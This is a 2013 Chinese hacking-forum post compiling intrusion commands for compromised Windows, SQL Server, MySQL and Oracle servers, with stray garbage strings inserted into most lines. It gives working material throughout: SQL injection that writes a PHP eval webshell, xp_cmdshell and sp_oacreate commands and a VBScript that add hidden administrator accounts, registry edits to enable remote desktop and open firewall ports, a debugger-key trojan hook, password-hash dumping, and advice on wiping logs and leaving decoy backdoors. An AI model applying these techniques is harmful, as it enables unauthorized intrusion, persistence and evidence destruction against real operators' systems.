找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 5343|回复: 0
打印 上一主题 下一主题

渗透技术大全

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:24:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
5 G: Z, |  R" z+ r9 G
1.net user administrator /passwordreq:no: t  D3 @9 r4 i) o( H  Z
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了; n+ a) b) W0 W% i0 @4 `0 b. P$ E
2.比较巧妙的建克隆号的步骤8 @6 p. @2 X6 A
先建一个user的用户
9 `' n( I& j) R. O/ C( c/ ?然后导出注册表。然后在计算机管理里删掉
6 l: v+ ^! m5 \0 D( M: B5 E在导入,在添加为管理员组
, S1 d  H6 Z4 V0 P# C# r, F3.查radmin密码
# e3 ?) w! c* }% d6 m0 y0 i( m% Yreg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg) K+ |: U6 @9 S: D  `& m
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
* u( h+ f0 M) k! E8 L建立一个"services.exe"的项! P- c; l. P; @$ V" \+ }
再在其下面建立(字符串值): t! P3 G, o$ C. i$ K* h% t
键值为mu ma的全路径
6 h! b! v* O3 y2 K5.runas /user:guest cmd% N5 @+ r3 d  Y  u( b- U; x+ `
测试用户权限!4 `: \& J+ F" R$ V* `
6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
9 \+ u" Q" D' i7.入侵后漏洞修补、痕迹清理,后门置放:$ q  i! w& _- R& B. v4 K
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门5 {4 T* Y' b. b) R" n( O
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
2 u( T' O: s; u3 l* a! i& `6 |- o* F" e4 [
for example
  _8 m' {  Q& X$ f; E7 M
* _4 f% i! d( O) B! h9 [: I, g: xdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
: U$ u" {! `. [; {+ _6 c
0 Y- P" [5 u6 j, A- ~4 q" d% xdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'9 N/ a! f, g6 ]: Z$ i& k
* l/ }2 I" N! U! i' e1 [
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了0 X- X2 j  }. }4 c* u6 _
如果要启用的话就必须把他加到高级用户模式
8 P% ~  O+ y, n8 U9 V& c, m可以直接在注入点那里直接注入
: V1 J9 Z/ r- l8 k/ n* Hid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--) Y$ B' j* K; G- d
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--4 Y; ]; }9 m% k# x: r- R+ F
或者
, n: l. o' L7 d# k2 f* W. ]sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
8 U# W+ J2 Y) {( d' A. U来恢复cmdshell。
/ S7 z4 q$ a+ q7 m( u% [* O9 D3 T* D: \) T4 h. w% j
分析器- Z) \0 J5 g* O/ ^5 r+ ]8 W9 b4 P
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
0 J: x. v; c5 W9 {9 B2 D然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")% R! x& f$ |1 o- b. O
10.xp_cmdshell新的恢复办法
# S( f# b7 d0 d& zxp_cmdshell新的恢复办法+ p' Y+ M" M% t6 i, `$ ?
扩展储存过程被删除以后可以有很简单的办法恢复:/ Y+ c' b, l# h# R# m- L1 z
删除, t& l% S' {! q# `
drop procedure sp_addextendedproc
7 E; ?& R" S# p4 E* B' I( Zdrop procedure sp_oacreate
) y7 R  j& T: w) v6 L4 V; Gexec sp_dropextendedproc 'xp_cmdshell'' e0 B: K3 T7 P3 f  V

. n, }! }" }4 Z2 j6 z恢复
& g. v0 F1 c1 P4 ]dbcc addextendedproc ("sp_oacreate","odsole70.dll")
7 ^7 J% H! s" _) c. Z& mdbcc addextendedproc ("xp_cmdshell","xplog70.dll")' O" \1 N( }5 b

( t; n7 Q) M/ r' C' q6 R5 X这样可以直接恢复,不用去管sp_addextendedproc是不是存在
7 ?5 p6 m3 \1 i4 g/ [- v( t1 @! c& C" {2 w
-----------------------------1 W2 A$ l9 q" x
/ l: Q- Y9 V. H# J: U! s. j
删除扩展存储过过程xp_cmdshell的语句:
. `. J- q$ f' b% Lexec sp_dropextendedproc 'xp_cmdshell'$ H/ k, r3 E2 _2 t; V; z6 p

  d3 S1 B0 ?* A恢复cmdshell的sql语句
2 @: V- R7 O) ^3 q3 F8 i& Jexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
, F9 q$ y. o, M) n0 i0 G- n6 H( l4 c& O" O
' Q* g: y  R; J. v2 A" t
开启cmdshell的sql语句
: K9 y$ t- ~* e. {4 Q3 ~8 r' Y% s( `# J) `! i7 n% Q1 v9 |7 w
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
& E: ]/ U  l1 k1 h+ C/ j- Y" ?) J/ n, l2 r. {* d. V3 F
判断存储扩展是否存在+ ]6 ~! Q0 A' `* Y& W8 g" C. W% F
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'9 d% g' K) Q/ H. f8 M5 U
返回结果为1就ok. V2 m6 ^4 t# V: l" b  o1 F# p

" Y4 c$ X0 w  Y. m9 u恢复xp_cmdshell
* z& v1 l- H0 v! \$ |4 P8 Gexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
1 {* d3 d) X; @5 e返回结果为1就ok
/ O( G" M% K$ F6 u4 z2 y0 w% R5 l( m$ x8 c
否则上传xplog7.0.dll) Q( z2 e2 _% L; |5 m1 ?4 I9 O8 v
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
* l: t2 R/ t* o9 f$ X5 y# o. Q8 W% R: @( S
堵上cmdshell的sql语句
3 S2 w8 n8 o# R8 u  D# |9 x5 i  O$ ]sp_dropextendedproc "xp_cmdshel5 ^- N& N2 y* F% U8 W4 R  E
-------------------------
- y* S: M) ^, D# W4 O8 P, ~清除3389的登录记录用一条系统自带的命令:
0 N$ g. ?9 Q4 c" Yreg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f' ]7 A$ T6 R5 j0 X6 I

0 y/ v' @3 t" }7 R7 |: k  ~然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件, J" b# w5 x7 Y! y. |; D0 V( L
在 mysql里查看当前用户的权限6 y& k$ v1 s3 C: [
show grants for  
8 V& s! y8 p1 E9 r+ Q$ e6 V6 j* _* k9 O3 ~9 D$ u$ {6 G
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。9 v+ Z# F2 Y( Q& n' K
2 L6 T- [, W3 q; x9 F1 `4 X% E
$ T9 o  g7 K3 ?- A" f- m
Create USER 'itpro'@'%' IDENTIFIED BY '123';
8 K1 n" h: Y, f' ^; ]* y0 w7 M0 F; O
1 e. \  I# n8 q, PGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
# ^2 w9 t$ o1 p% `! K" V; D" o1 b$ U9 |# W/ H: l# d
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0* E4 `  k+ k/ j/ T) K% u( Q: K

( X0 v5 v; Z  V' q1 V6 ~MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;" T& O. [, S0 f* J9 a8 i
& T, }& U$ O& A7 T5 d& h8 \
搞完事记得删除脚印哟。; x& A# {- K: L8 D$ u( A) e, t2 \

( K8 h7 T( ?' P2 s: w$ ?Drop USER 'itpro'@'%';3 M0 E  m4 c9 D  T* V- Q5 e4 ?

; {" G# s- k; P" {4 v2 ]- }Drop DATABASE IF EXISTS `itpro` ;
3 u- c! ^+ t$ d
. Z6 L! J5 E0 I/ S) c当前用户获取system权限
  c' I3 I# j6 M9 }/ Zsc Create SuperCMD binPath= "cmd /K start" type= own type= interact
% a  R6 M) r% t) asc start SuperCMD8 f, H$ ?9 N8 a+ p
程序代码
! M% j  D+ N0 Q<SCRIPT LANGUAGE="VBScript">* ^( c0 l- M' d& {" |! v& B' p
set wsnetwork=CreateObject("WSCRIPT.NETWORK")( N& k8 x4 g& D
os="WinNT://"&wsnetwork.ComputerName# E, j8 p& e$ o- V3 `
Set ob=GetObject(os)6 d; |3 \: E3 r
Set oe=GetObject(os&"/Administrators,group"), B' R# ]* y+ {
Set od=ob.Create("user","nosec")
3 ]7 Y' o5 ~& \7 _% }3 jod.SetPassword "123456abc!@#": L, E$ @* n$ V$ R! I
od.SetInfo+ G% z/ m0 w* R2 K5 g, |( f$ F
Set of=GetObject(os&"/nosec",user). G5 G* j8 y: ~9 X' M3 o
oe.add os&"/nosec"
, ~- g5 z) C& ]) |</Script>+ C+ e' n% V" R' t, G9 f
<script language=javascript>window.close();</script>! _/ I/ o# h, U

$ r$ N/ S2 o' |8 j. Z
( k+ t; I* K3 h! A- R& l- _6 P+ ^, F% h5 R+ X6 j
( D9 h  R) v3 Z: J4 f7 Y7 }8 o& W5 t
突破验证码限制入后台拿shell( g# E) A2 L+ t$ `8 ?8 b
程序代码
8 i# q" _. t; V" q# T! UREGEDIT4 9 G: `/ k5 m( i/ t3 j# v
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] ' ~5 |. @! P7 V7 ?  c
"BlockXBM"=dword:00000000
) i8 i6 Y3 a9 @' j* w* O
+ S+ P& q$ V+ S' G保存为code.reg,导入注册表,重器IE
4 P9 N8 D3 k3 y$ G! j7 G/ E就可以了; S5 w" F( v$ s# _
union写马
! H" f3 R& h* D" L/ E; e$ d程序代码
/ _% C  i0 t$ gwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*0 \. _( j- G( m# D8 p0 z3 y: m

5 N7 e* ~' L4 J! ~# e' F1 D1 F5 ?应用在dedecms注射漏洞上,无后台写马
. S( J' k* j+ G9 M. Xdedecms后台,无文件管理器,没有outfile权限的时候
- x6 u! H) P$ U( t. [) Q; c1 X' I在插件管理-病毒扫描里8 D* _  J, M) v* w9 V9 V
写一句话进include/config_hand.php里
# \* P1 c' W: v# _8 R: p程序代码
' p. t' |$ O2 a>';?><?php @eval($_POST[cmd]);?>; B/ y+ ~) r( [) n* Q$ `
" s- \8 R2 ?) R+ v
% ?8 F$ Q' g8 Y* X$ I
如上格式* b  w9 L7 @( c7 g5 N3 z6 J

% w6 t1 b7 G2 F" p( v4 o: @oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
) y3 ]+ H9 j- Y程序代码
: S/ N0 C8 x% c$ V* Dselect username,password from dba_users;
! ^! d; {0 H# {" E: m$ v  j
  `' l  U! r: h; z
5 S. c; w1 i  Q% z! z, umysql远程连接用户
7 N3 H: J2 y' B. `4 [程序代码
) Y& X4 W# [, e+ v8 M
5 u. b4 d' b+ O; `0 {9 {; E- {Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';: N( x  F$ V3 B; I" i7 X) a9 ?5 M
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
" V( [/ a7 \; R+ M% w2 KMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
$ B6 s. I- J, Z. CMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
: R8 T: x: T# [3 m, s& F( k: P2 |' x- Y
# w! c; x) i. F$ G5 f+ T0 n% h  Z3 ~- H8 @

0 y+ e! w# Y* Q/ T' v0 x6 k/ z7 p) f% y9 r- o
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
9 Q7 M; z0 y1 K1 `8 B* X; ~) I" V% n# W3 u
1.查询终端端口
; C& K' C3 o! r% B5 s3 c8 l0 e7 Q- p# S' G
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber% V$ O, }/ F) O5 o& V7 y9 s* ?

2 D! T% I5 b$ ]; C& O通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
3 r+ q2 P7 X" [& O  T9 ?/ |type tsp.reg( R5 d) ]0 m7 [/ M. T* u

' N7 F; P6 k1 p& _  n2.开启XP&2003终端服务
$ F' O  x, ~/ n9 Z* H& i$ I( }/ s6 K1 C; }  `, R0 Y$ a
# n& ^( Y  z: S) Z5 }6 W- U# `
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f8 i$ ~" g4 ?  k5 m3 x; o- m5 Y5 g

# ?: A3 H3 j/ _1 |2 q, b2 m7 u+ R; u2 l8 p7 t2 `7 N# ]
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
; i2 ~" S6 \3 I' L6 x
. J- x& G5 q4 k8 b- x$ ?/ l) t3.更改终端端口为20008(0x4E28)
! G- H7 x. ]. h. A2 _
4 C0 [' A  U. B4 hREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
7 M9 f0 F- W1 ?
, X, ^) m4 t7 O8 d# N% Z* b9 uREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
5 C: |1 ^7 H- {, z( M* I  v3 [5 I5 T+ _5 J3 O
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制5 F* t, x9 _% c6 u& j4 `

, y- G, p; e; }) ]0 @; vREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
) h' o, t2 e' W. q% P( t( ~- g7 X

3 ?3 V2 C, P$ y' Q. a- Q2 l5.开启Win2000的终端,端口为3389(需重启)7 b0 [3 q) a1 ?# W3 C$ m

; d% F  d: p! [7 [, Fecho Windows Registry Editor Version 5.00 >2000.reg
& O, O" o: z( d8 Techo. >>2000.reg
3 Y( ^, H/ F8 r2 u2 I: Xecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
8 w  _0 o6 C1 s' A! I, g" ?. jecho "Enabled"="0" >>2000.reg - `( I7 X. G. \
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg 0 y* L8 h1 w3 [( i. U9 N- ]" O
echo "ShutdownWithoutLogon"="0" >>2000.reg 1 z/ d6 h$ t4 o9 n) C
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
  Q+ F+ w1 _9 Cecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
- _- C6 y/ O2 f8 O) `echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
2 k( {! ?; R7 I9 P: hecho "TSEnabled"=dword:00000001 >>2000.reg " c; m% _; K& A: v
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg ! A5 z+ W4 |9 ^& |+ i
echo "Start"=dword:00000002 >>2000.reg 8 x4 J; i; t# t% j/ s
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg % J5 q. _8 @' ~, N3 g7 o
echo "Start"=dword:00000002 >>2000.reg , B. V6 m% ?5 U
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
6 k: V# p) |0 X9 h& ~- `echo "Hotkey"="1" >>2000.reg 5 ^" b: L; e) V$ u
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg 9 y  `; @6 b6 k$ L
echo "ortNumber"=dword:00000D3D >>2000.reg 4 ?& G& v" c1 Q* t
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg : y1 H; @3 e# i9 d
echo "ortNumber"=dword:00000D3D >>2000.reg2 ^$ m+ H" d8 ^0 w  M, Q
; c  e( Z. U% `) g5 \  [) k
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)* s* k) Q% q1 O# v- e) R
, v8 E* ^- s) s+ F; z
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf' W! _( a9 [5 I  n9 B) E$ T; S( [
(set inf=InstallHinfSection DefaultInstall)
, `. D6 w1 l  E1 Techo signature=$chicago$ >> restart.inf  n+ x  O/ I3 m" j) I3 j1 H8 G" y
echo [defaultinstall] >> restart.inf
* b2 m9 z" `: o) E% u! V( E* ~) [- Z" f; ~rundll32 setupapi,%inf% 1 %temp%\restart.inf2 t- j2 w* h  Z
2 p( E. G1 d/ y

+ [# U$ w4 F2 n1 n- O' ^" _$ v, @1 _7.禁用TCP/IP端口筛选 (需重启)! v5 u9 X0 G% J7 L7 y, _9 v
% P- L/ C/ A" j, F# B  q
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
& |7 J# X$ O$ m( G  _. H9 R( Q$ p# c6 k0 V1 J1 p
8.终端超出最大连接数时可用下面的命令来连接: V  Y# M' e4 l" @

" w% K/ ~- c- ?, R% }- M2 lmstsc /v:ip:3389 /console
) L; R8 Y0 O  E8 }. u$ @! m# R. `9 O2 I; D/ j
9.调整NTFS分区权限6 X/ f: X! T. Y9 ~; n

5 ^; t/ K) n+ _0 w- e, Acacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)0 M: B- i' ]! s

1 [/ _/ A5 P7 K+ {: z+ \9 R# rcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)3 d6 G* U' h" V/ K, l, b! w+ m* j% x

5 _# b2 P( w5 u6 }2 b6 |' ?------------------------------------------------------# h* {, I) H1 }2 p$ x! g
3389.vbs 2 c" z6 [% F# F6 l& ^0 `' r+ R
On Error Resume Next
; t9 [& D1 I& _5 O! O4 l' U; ~; I$ `const HKEY_LOCAL_MACHINE = &H80000002
6 ~9 B5 }( o' ?' E* _strComputer = "."+ ?- Q2 F+ S/ w4 e1 u7 w; |
Set StdOut = WScript.StdOut6 S, q0 C0 Q+ \7 K& Z
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
8 W% \3 x5 u5 astrComputer & "\root\default:StdRegProv")
) ]" t$ D6 y9 K- s3 dstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"0 V, L$ Q3 D% @( o) }% q
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
  w: L; |& [1 [, J" wstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"* u/ }& s! C0 k, p3 U. b$ e5 R
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath* @2 H& [: g! m, q6 v/ z
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
4 r& H, q1 I" o+ _- \6 q1 s- @strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"& i' Z1 {! f! ]5 @  p1 S& t
strValueName = "fDenyTSConnections"
0 k$ v& h1 ?2 VdwValue = 0- S  B9 x, E4 w6 J
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue  Q, x- q, Y2 m( J  c" ?( [
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
( d0 g& z4 j. ]  s0 f; istrValueName = "ortNumber"
6 H; w$ Q5 B$ m4 UdwValue = 3389
6 \4 d7 f: V/ j) p* U8 _& M% C4 N, ioreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue+ l5 n+ }7 A; G* T7 R  }) j
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
, \, |9 u; p9 Z0 I! h8 Y. JstrValueName = "ortNumber"2 y% o: X( n# k1 {% z9 l0 X
dwValue = 3389
4 J& b8 Q. ?" W. aoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue% z$ R5 x5 L' y7 ?2 I$ C. s
Set R = CreateObject("WScript.Shell")
+ g7 S7 t/ U, M  IR.run("Shutdown.exe -f -r -t 0") " V" G. a! N' Q+ w, j& H

7 i9 _+ K: |7 X% M1 `* d2 w+ A# e删除awgina.dll的注册表键值
3 m4 l; e; O/ Z9 e% w" C# J程序代码
% _: \, z* r. r* ~0 }1 D
$ T/ |7 m% N7 k/ F4 ?0 j! @  Xreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
8 W2 \8 F( H! X+ D% v& u4 n) n* b) X6 a6 J8 T; U4 \/ V

) Y$ @% C( ?" t# n* T* W* U! ~0 e" {2 \( O6 w* d0 L
, h' |$ V' K/ A/ u" h$ k1 _
程序代码( s4 h+ J+ L& Q+ _8 X
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash! W& k5 y: u( P. Z' v6 n

: |: D  l/ A  g6 M设置为1,关闭LM Hash4 I( [$ m+ O! N% ~, V8 l9 y% n- u6 |

: V( _8 l9 t& b数据库安全:入侵Oracle数据库常用操作命令
$ T3 }! U! j# P$ ^( N最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。" s% _. g: a4 I& I) ?3 l1 X, Q
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
# l) O9 i! K, i( ]* @2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
0 w9 x8 J0 X6 s$ h( S/ M. _3、SQL>connect / as sysdba ;(as sysoper)或, M* C0 N( ?: N/ a4 X: H+ U
connect internal/oracle AS SYSDBA ;(scott/tiger)
& l( f8 G& K( nconn sys/change_on_install as sysdba;
! g4 v8 t% t1 I6 u, E" N4、SQL>startup; 启动数据库实例
8 e" d' S7 t/ ?; {5 @' l5、查看当前的所有数据库: select * from v$database;( g% R; M0 N1 S/ ^
select name from v$database;
9 m0 |0 K# H* @2 v1 `  L6、desc v$databases; 查看数据库结构字段+ B9 ]6 ^, P$ i0 ^5 J7 R. @! y) F0 g
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:- P! m! ]+ S2 T; s2 \; C/ ~* a
SQL>select * from V_$PWFILE_USERS;/ C! |7 L! f0 F% `, x4 U7 `) z
Show user;查看当前数据库连接用户) S! p9 Y: ^$ X1 l4 T! w. W. w: v
8、进入test数据库:database test;
, E# j! ]# }* V6 F4 D9、查看所有的数据库实例:select * from v$instance;, m8 j2 ^" W( a. B! T
如:ora9i6 Q  [% k; v! G* U0 e! Y
10、查看当前库的所有数据表:
( L; q. z4 b+ [# P4 K/ t8 }SQL> select TABLE_NAME from all_tables;% n9 w' ?) q7 f& O
select * from all_tables;" S0 @6 F3 `  e" [6 V' E% g& |
SQL> select table_name from all_tables where table_name like '%u%';
- x5 N3 L- V3 N. i2 \' f% ~) ^TABLE_NAME3 u6 I7 q# B( [$ D8 O7 @) y2 w
------------------------------
0 Z+ n8 C$ Y$ L0 R_default_auditing_options_8 |( l% U! `% v/ Q
11、查看表结构:desc all_tables;
( B; s2 h5 W7 L  p4 k5 D12、显示CQI.T_BBS_XUSER的所有字段结构:+ A( @# M- m, `5 A
desc CQI.T_BBS_XUSER;
, N+ G4 N" I8 a13、获得CQI.T_BBS_XUSER表中的记录:
) ]+ @/ g. U" m! Oselect * from CQI.T_BBS_XUSER;
' o7 D6 i  f$ j3 F14、增加数据库用户:(test11/test)  b8 _) s5 y6 H8 g6 L
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
( E/ F  y8 U2 t7 a+ R0 [15、用户授权:. M& O7 N! i9 X! m# v  M- {  i! _
grant connect,resource,dba to test11;
* ?1 t3 h$ z3 y, ^) Tgrant sysdba to test11;" f5 F8 O7 o# _. O* |
commit;
$ K& {5 Q3 }8 L1 T; ~# V16、更改数据库用户的密码:(将sys与system的密码改为test.)! n, X* }9 O0 `7 e/ w) L
alter user sys indentified by test;# u/ H, m% C+ q8 G" s
alter user system indentified by test;
0 d/ L3 Q0 y; @9 F/ ?  D3 A+ U$ e5 K. B
applicationContext-util.xml  q- U, S, Y1 e! |0 f
applicationContext.xml. h' e( i. Z& C
struts-config.xml
& `/ X3 r  U/ A+ M8 Tweb.xml4 ^! e. C6 H& }: a0 @/ I! j
server.xml
* |4 ?/ q/ M; B* W  |7 O6 ztomcat-users.xml/ e, K( C/ L9 K. ~
hibernate.cfg.xml
! U4 @& S' B& Ndatabase_pool_config.xml! L% N  J* o+ d7 |3 t  T& l# N

+ y9 T0 M# K- d" Q9 Z, R2 e$ T" F3 ]( v+ N" O$ C% I- Z
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
+ r- R( e! k, m) v! B! q$ ^3 `\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini
% J2 i% x- Y) C6 k\WEB-INF\struts-config.xml  文件目录结构7 t' {' ]! x/ ]  w4 O, P0 B+ e. j
, Z9 ]3 w, ~3 Q  ], V3 o( N
spring.properties 里边包含hibernate.cfg.xml的名称( z, v7 `% |8 g% l  @0 e

/ @% V( ~( X# c4 d2 S
4 ]! `$ n$ X% [C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
; Q4 V, K" O# R$ L. X: r1 ]3 l" H- O. \
如果都找不到  那就看看class文件吧。。4 t+ U, }. x* p) P2 Z  b1 `% E) R

: i3 s# F1 {  }( Q+ I9 }  J6 b测试1:
& {$ T2 a6 K' i! V1 NSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t10 F: k: u" Q* g1 c, _3 ]3 X0 l( i
. V% K, R+ {5 H2 t7 ^; e
测试2:
0 t6 A" m3 S( p: h# j/ j) v" ?5 z- Q
create table dirs(paths varchar(100),paths1 varchar(100), id int)4 K6 k, L, o( l
; Y+ Q  Z; t0 q5 ]) p- ^( z
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
) Z4 p' L2 h& a: R: k- Z$ q8 W$ v8 O, k' @) e' U  S# N9 b( {
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1, T) f/ W8 c  _& x$ t

% B7 ^3 |  e3 r& l查看虚拟机中的共享文件:
* V1 W8 S& j  [在虚拟机中的cmd中执行
, L4 U- w4 t% b, f+ l\\.host\Shared Folders
3 L& K. t7 A; q* c, [) T# j9 ]: }
cmdshell下找终端的技巧1 A1 n2 }; D! Y% `( M" C
找终端:
# B! }+ i5 A3 l第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
/ ?9 i% V4 K2 Q9 s8 i6 u6 y   而终端所对应的服务名为:TermService
! Y) b. p. @: c) L% W第二步:用netstat -ano命令,列出所有端口对应的PID值! 6 x+ ~9 j+ f3 D* O$ P, e& v
   找到PID值所对应的端口% ]$ B2 M& j( r/ e  O

: i6 F7 O6 J3 F' y2 {. v查询sql server 2005中的密码hash
